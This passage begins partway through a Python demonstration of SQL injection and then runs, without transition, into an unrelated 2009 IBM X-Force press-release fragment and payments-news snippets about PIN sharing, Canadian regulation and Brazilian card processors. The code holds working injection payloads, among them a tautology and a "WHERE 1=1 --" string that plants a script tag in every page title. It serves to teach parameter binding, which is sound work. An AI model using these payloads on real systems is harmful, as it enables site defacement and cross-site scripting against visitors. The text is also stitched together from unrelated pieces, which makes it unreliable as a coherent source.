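    """Parameter binding: the input is only ever a value, never SQL."""
    return conn.execute("SELECT name, card_last4 FROM users WHERE name = ?", (name,)).fetchall()


def set_page_title_unsafe(conn, page_id, title):
    """Vulnerable UPDATE: a payload can widen the WHERE clause to every row."""
    sql = "UPDATE pages SET title = '%s' WHERE id = %d" % (title, page_id)
    conn.execute(sql)
    conn.commit()


def set_page_title_safe(conn, page_id, title):
    """Bound parameters keep the statement shape fixed: one row, literal title."""
    conn.execute("UPDATE pages SET title = ? WHERE id = ?", (title, page_id))
    conn.commit()


def titles(conn):
    return [row[0] for row in conn.execute("SELECT title FROM pages ORDER BY id")]


def infected_pages(conn):
    """Titles that now carry a script tag (what a site's visitors would receive)."""
    return [t for t in titles(conn) if "<script" in t.lower()]


def demo_mass_injection(unsafe):
    """Send the page-title payload through one update path; return the infected
    titles and the full title list so the two paths can be compared."""
    conn = build_db()
    # Closes the string literal, makes the WHERE clause always true, comments out the rest.
    payload = INJECTED_TAG + "' WHERE 1=1 --"
    setter = set_page_title_unsafe if unsafe else set_page_title_safe
    setter(conn, 1, payload)
    return infected_pages(conn), titles(conn)


if __name__ == "__main__":
    db = build_db()
    tautology = "x' OR '1'='1"
    print("unsafe lookup:", lookup_user_unsafe(db, tautology))
    print("safe lookup:  ", lookup_user_safe(db, tautology))
    print("unsafe update:", demo_mass_injection(True))
    print("safe update:  ", demo_mass_injection(False))
```

Note that the parameterised update still stores the attacker's string as the title of page 1; binding parameters stops the query from being rewritten, but whatever is stored still has to be HTML-encoded when it is rendered, or the single page remains an XSS vector.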



"Two of the major themes for the first half of 2009 are the increase in sites hosting malware and the doubling of obfuscated Web attacks," Lamb said. "The trends seem to reveal a fundamental security weakness in the Web ecosystem where interoperability between browsers, plugins, content and server applications dramatically increase the complexity and risk. Criminals are taking advantage of the fact that there is no such thing as a safe browsing environment and are leveraging insecure Web applications to target legitimate Web site users."



The 2009 Midyear X-Force report also finds that:

















The X-Force research team has been cataloguing, analyzing and researching vulnerability disclosures since 1997. With more than 43,000 security vulnerabilities catalogued, it has the largest vulnerability database in the world. This unique database helps X-Force researchers to understand the dynamics that make up vulnerability discovery and disclosure.

IBM is one of the world's leading providers of risk and security solutions. Clients around the world partner with IBM to help reduce the complexities of security and strategically manage risk. IBM's experience and range of risk and security solutions -- from dedicated research, software, hardware, services and global Business Partner value -- are unsurpassed, helping clients secure business operations and implement company-wide, integrated risk management programs.



For more security trends and predictions from IBM, including graphical representations of security statistics, download the 2009 IBM X-Force Mid-Year Trend and Risk Report today.



About IBM

For more information about IBM, visit www.ibm.com...nuff said.




















Survey Says! 8 Million Brits Share PIN Numbers




Eight million Brits share PIN numbers - survey

Finextra: Over eight million Brits have handed over their Chip and PIN details to someone else in the last year, with a quarter of these falling victim to fraud, according to a survey for insurance firm LV=.

An online poll of 3002 people shows 20% have given out their card and PIN number - 85% of these in the past year - to someone else to make a purchase on their behalf or get money from a cash machine.

By far the worst offenders are younger people with over one in three of the under 35s admitting they have asked someone else to use one of their cards. The most common location for 'borrowed' cards to be used is at a cash machine.

Continue Reading at Finextra




Canadian Think Tank: Credit Card Companies Should be Federally Regulated




Canada urged to expand financial regulatory powers | Markets | Markets News | Reuters


"Credit card companies should be federally regulated"



OTTAWA, Aug 26 (Reuters) - Canada's banking regulator should license and approve all financial instruments available to investors in the country, even if they originate in the United States, a new report recommended on Wednesday.



The report by two economists at the Canadian Centre for Policy Alternatives, a left-leaning think tank, also urged the rapid creation of a single securities regulator in Canada to make sure officials can properly monitor markets and detect risky behavior or excesses before they get out of control.



A single financial markets watchdog, replacing the 13 regional regulators now in place, is a key ambition of Finance Minister Jim Flaherty and would bring under federal jurisdiction the "shadow" banking sector. That unregulated sector once accounted for nearly half of all Canadian borrowing and includes non-bank lenders as well as hedge funds and securitized debt vehicles.



Continue Reading at Reuters


















VisaNet, Redecard Shares Fall on Brazil Competition Concern





Aug. 26 (Bloomberg) -- Redecard SA and Cia. Brasileira de Meios de Pagamento, Brazil’s biggest debit- and credit-card payment processing companies, fell the most in at least two weeks after a newspaper reported the companies may face increased competition from state-controlled lenders.

Redecard, the processor of Mastercard Inc. payments, lost 1.7 percent to 26.25 reais in Sao Paulo trading for the biggest decline since Aug. 12. VisaNet, as the processor of Visa Inc. payments is known, slid 3.3 percent, the most since Aug. 6, to 16.81 reais.


Federally controlled banks Banco do Brasil SA and Caixa Economica Federal will “soon” start offering credit cards under their own brand as part of a government effort to increase competition, Brasilia-based Correio Braziliense newspaper reported today without saying where it obtained the information.

“The report adds to concern that these companies will face more competition in the future,” said Mariana Taddeo, an analyst with Link Investimentos in Sao Paulo.


Continue Reading



















